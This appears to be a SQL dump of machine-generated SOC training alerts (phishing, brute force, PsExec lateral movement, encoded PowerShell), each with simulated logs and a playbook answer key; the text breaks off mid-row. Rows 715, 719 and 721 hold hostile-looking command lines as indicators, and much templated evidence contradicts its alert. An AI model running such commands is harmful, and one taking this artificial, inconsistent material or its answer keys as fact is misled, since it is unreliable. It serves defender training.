(712, 'Spear-Phishing Attempt by APT29', 'medium', 'Proofpoint', 'A spear-phishing email was detected targeting the finance department. It included a link to a credential harvesting site.', 'Phishing', 'T1566', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T10:15:47Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.22\",\"username\":\"j.doe@company.com\",\"hostname\":\"mail-server-01\",\"email_sender\":\"finance@trusted-source.com\",\"url\":\"http://malicious-link.com/login\"}', '2026-01-10 20:11:25', '2026-02-22 14:40:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"finance@trusted-source.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"EmailRep\",\"verdict\":\"suspicious\",\"details\":\"Domain used in multiple phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-link.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL classified as phishing site\"}}],\"expected_actions\":[\"block_url\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The phishing URL and suspicious sender email confirm the phishing attempt, marking it as true positive.\"}', 'Beginner', 'SIEM', 3, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Spear-Phishing Attempt by APT29\",\"date\":\"2026-02-01T20:32:22.358Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(713, 'Failed Login Attempts from Unusual Location', 'low', 'Splunk', 'Multiple failed login attempts detected for user \'admin\' from a foreign IP address indicating potential brute force attack.', 'Credential Attack', 'T1078', 0, 'Closed', 210, '{\"timestamp\":\"2026-01-11T14:22:59Z\",\"event_type\":\"login_failure\",\"src_ip\":\"212.47.229.1\",\"dst_ip\":\"192.168.1.10\",\"username\":\"admin\",\"hostname\":\"auth-server-01\",\"failed_attempts\":15}', '2026-01-09 22:20:35', '2026-02-26 21:56:46', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"212.47.229.1\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP involved in multiple unauthorized access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Standard admin account for internal systems\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The failed login attempts from a suspicious IP suggest a brute force attack, making it a true positive.\"}', 'Beginner', 'SIEM', 3, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.359Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T14:22:59Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"212.47.229.1\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"auth-server-01\\\",\\\"failed_attempts\\\":15}\"},{\"timestamp\":\"2026-02-01T20:31:22.359Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password 
for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T14:22:59Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"212.47.229.1\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"auth-server-01\\\",\\\"failed_attempts\\\":15}\"},{\"timestamp\":\"2026-02-01T20:30:22.359Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T14:22:59Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"212.47.229.1\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"auth-server-01\\\",\\\"failed_attempts\\\":15}\"},{\"timestamp\":\"2026-02-01T20:29:22.359Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T14:22:59Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"212.47.229.1\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"auth-server-01\\\",\\\"failed_attempts\\\":15}\"},{\"timestamp\":\"2026-02-01T20:28:22.359Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T14:22:59Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"212.47.229.1\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"auth-server-01\\\",\\\"failed_attempts\\\":15}\"}],\"query\":\"index=main 
source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(714, 'Suspicious Network Activity Detected (False Positive)', 'medium', 'Firewall', 'Unusual network traffic was detected from an internal IP to an external cloud service. Further investigation reveals this as legitimate user activity.', 'Network Anomaly', 'T1078', 0, 'investigating', NULL, '{\"timestamp\":\"2026-01-11T16:30:12Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.20\",\"dst_ip\":\"52.34.67.89\",\"username\":\"m.smith\",\"hostname\":\"user-pc-02\",\"domain\":\"cloud-storage.com\"}', '2026-01-10 13:30:15', '2026-03-04 16:08:41', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"cloud-storage.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"Legitimate cloud storage service\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network_activity\",\"analysis_notes\":\"The traffic was confirmed to be legitimate access to a known cloud service by an authorized user, hence a false positive.\"}', 'Beginner', 'NDR', 3, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(715, 'Malicious File Execution Detected', 'high', 'CrowdStrike', 'A suspicious process was executed on the host, potentially linked to APT41 activity. The process resembles known malware used for data exfiltration.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T10:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"hostname\":\"host-001\",\"command_line\":\"powershell.exe -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAYwBvAG0AbQBhAG4AZAAgAC0AZQBuAGMAbwBkAGUAZABiAHkAdABlAHMAPQAiAFsAMgAsADIANgAsADIAOAAsADMAQgAsADQALAAxADgALAAxADcALAAxADkALAAyADAALAAzADkALAAxADkALAAyADAALAA5ADUALAA5ADUALAA5ADMAIgBdAA==\",\"file_hash\":\"3fa4e4bd6a8f7a8c5b2aabc1d7b9f4d2\"}', '2026-01-11 07:59:37', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal network address\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3fa4e4bd6a8f7a8c5b2aabc1d7b9f4d2\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with APT41 malware\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"powershell.exe -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAYwBvAG0AbQBhAG4AZAAgAC0AZQBuAGMAbwBkAGUAZABiAHkAdABlAHMAPQAiAFsAMgAsADIANgAsADIAOAAsADMAQgAsADQALAAxADgALAAxADcALAAxADkALAAyADAALAAzADkALAAxADkALAAyADAALAA5ADUALAA5ADUALAA5ADMAIgBdAA==\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded command indicative of malicious activity\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The decoded PowerShell command and the file 
hash are linked to known APT41 malware, indicating a true positive.\"}', 'Intermediate', 'EDR', 5, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(716, 'Suspicious Login Attempt Detected from Foreign IP', 'medium', 'SIEM', 'Multiple failed login attempts detected from a suspicious IP address. This could indicate a brute force attack targeting user credentials.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T09:30:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.23\",\"username\":\"asmith\",\"hostname\":\"host-002\",\"failed_attempts\":15}', '2026-01-10 14:22:49', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"asmith\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Valid internal user account\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The multiple failed login attempts from a known malicious IP address confirm a brute force attack.\"}', 'Intermediate', 'SIEM', 5, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.361Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"username\\\":\\\"asmith\\\",\\\"hostname\\\":\\\"host-002\\\",\\\"failed_attempts\\\":15}\"},{\"timestamp\":\"2026-02-01T20:31:22.361Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"username\\\":\\\"asmith\\\",\\\"hostname\\\":\\\"host-002\\\",\\\"failed_attempts\\\":15}\"},{\"timestamp\":\"2026-02-01T20:30:22.361Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"username\\\":\\\"asmith\\\",\\\"hostname\\\":\\\"host-002\\\",\\\"failed_attempts\\\":15}\"},{\"timestamp\":\"2026-02-01T20:29:22.361Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"username\\\":\\\"asmith\\\",\\\"hostname\\\":\\\"host-002\\\",\\\"failed_attempts\\\":15}\"},{\"timestamp\":\"2026-02-01T20:28:22.361Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"username\\\":\\\"asmith\\\",\\\"hostname\\\":\\\"host-002\\\",\\\"failed_attempts\\\":15}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(717, 'Phishing Email with Malicious URL Detected', 'high', 'Proofpoint', 'A phishing email was received with a URL designed to harvest credentials. The email mimics a trusted service to lure the user.', 'Phishing', 'T1566', 1, 'Closed', 177, '{\"timestamp\":\"2026-01-11T11:00:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.20\",\"email_sender\":\"no-reply@trustedservice.com\",\"username\":\"mjane\",\"hostname\":\"host-003\",\"url\":\"http://malicious-site.com/login\"}', '2026-01-09 19:07:59', '2026-02-22 10:25:32', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"IP associated with phishing activity\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"no-reply@trustedservice.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Email appears to mimic a trusted domain\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-site.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"URL is flagged as a credential harvesting site\"}}],\"expected_actions\":[\"block_url\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The malicious URL in the phishing email is confirmed to be used for credential harvesting, indicating a true positive.\"}', 'Intermediate', 'SIEM', 5, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Email with Malicious URL Detected\",\"date\":\"2026-02-01T20:32:22.363Z\",\"x-mailer\":\"PHPMailer 
6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(718, 'False Positive Alert: Unusual Internal Traffic', 'low', 'Firewall', 'Detected unusual traffic patterns between internal hosts. Further analysis indicates this is benign activity related to scheduled maintenance.', 'Network Traffic Anomaly', 'T1071', 0, 'closed', NULL, '{\"timestamp\":\"2026-01-11T08:15:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.0.5\",\"dst_ip\":\"10.0.0.8\",\"username\":\"n/a\",\"hostname\":\"n/a\",\"request_body\":\"n/a\"}', '2026-01-10 22:11:35', '2026-02-22 14:54:09', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal network address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.8\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal network address\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network_traffic\",\"analysis_notes\":\"The traffic is consistent with scheduled internal maintenance tasks, confirming a false positive.\"}', 'Intermediate', 'NDR', 5, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(719, 'APT29 Lateral Movement Detected via PsExec', 'critical', 'CrowdStrike', 'A potential APT29 operation has been detected using PsExec to move laterally within the network. Internal IP communication suggests compromised credentials.', 'Lateral Movement', 'T1077', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T03:14:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.21\",\"dst_ip\":\"10.0.0.34\",\"username\":\"jdoe\",\"hostname\":\"FINANCE-01\",\"command_line\":\"PsExec.exe \\\\\\\\10.0.0.34 -u jdoe -p password cmd.exe\"}', '2026-01-10 01:17:50', '2026-02-16 18:05:31', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.21\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address used in lateral movement\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.34\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Target internal IP address for lateral movement\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Legitimate internal user account potentially compromised\"}},{\"id\":\"artifact_4\",\"type\":\"command\",\"value\":\"PsExec.exe \\\\\\\\10.0.0.34 -u jdoe -p password cmd.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"PsExec tool commonly used for lateral movement\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"PsExec usage between internal machines indicates possible lateral movement by APT29.\"}', 'Advanced', 'EDR', 7, 1, 'OT_ICS', NULL, NULL, 
'{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(720, 'Spear-Phishing Email with Malicious URL', 'high', 'Proofpoint', 'An email from a suspicious sender was detected containing a malicious URL likely used for credential harvesting.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T08:25:45Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.85\",\"dst_ip\":\"192.168.1.45\",\"username\":\"jane.smith\",\"hostname\":\"LAPTOP-04\",\"email_sender\":\"support@secure-mail.com\",\"url\":\"http://malicious-website.com/login\"}', '2026-01-11 06:08:40', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.85\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP reported 12 times for suspicious activity\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-website.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL flagged for phishing credential harvest\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"support@secure-mail.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Email domain used for spoofing legitimate services\"}}],\"expected_actions\":[\"block_url\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email contains a known phishing URL attempting to mimic legitimate services.\"}', 'Advanced', 'SIEM', 7, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Spear-Phishing Email with Malicious URL\",\"date\":\"2026-02-01T20:32:22.366Z\",\"x-mailer\":\"PHPMailer 
6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(721, 'Encoded PowerShell Command Execution Detected', 'high', 'Wazuh', 'An encoded PowerShell command was detected on a user machine, indicating possible fileless malware activity.', 'Malware', 'T1059.001', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T15:42:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.50\",\"dst_ip\":\"\",\"username\":\"michael.brown\",\"hostname\":\"DESKTOP-07\",\"command_line\":\"powershell.exe -enc aW1wb3J0LXdpbiBtd2lzO3N0YXJ0LWpvYiB3bWk7\"}', '2026-01-10 07:11:45', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP potentially executing fileless malware\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -enc aW1wb3J0LXdpbiBtd2lzO3N0YXJ0LWpvYiB3bWk7\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Encoded command associated with malware delivery\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The use of encoded PowerShell commands is indicative of fileless malware techniques often used by APT groups.\"}', 'Advanced', 'EDR', 7, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.367Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. 
Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T15:42:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"michael.brown\\\",\\\"hostname\\\":\\\"DESKTOP-07\\\",\\\"command_line\\\":\\\"powershell.exe -enc aW1wb3J0LXdpbiBtd2lzO3N0YXJ0LWpvYiB3bWk7\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.367Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T15:42:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"michael.brown\\\",\\\"hostname\\\":\\\"DESKTOP-07\\\",\\\"command_line\\\":\\\"powershell.exe -enc aW1wb3J0LXdpbiBtd2lzO3N0YXJ0LWpvYiB3bWk7\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.367Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T15:42:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"michael.brown\\\",\\\"hostname\\\":\\\"DESKTOP-07\\\",\\\"command_line\\\":\\\"powershell.exe -enc aW1wb3J0LXdpbiBtd2lzO3N0YXJ0LWpvYiB3bWk7\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.367Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. 
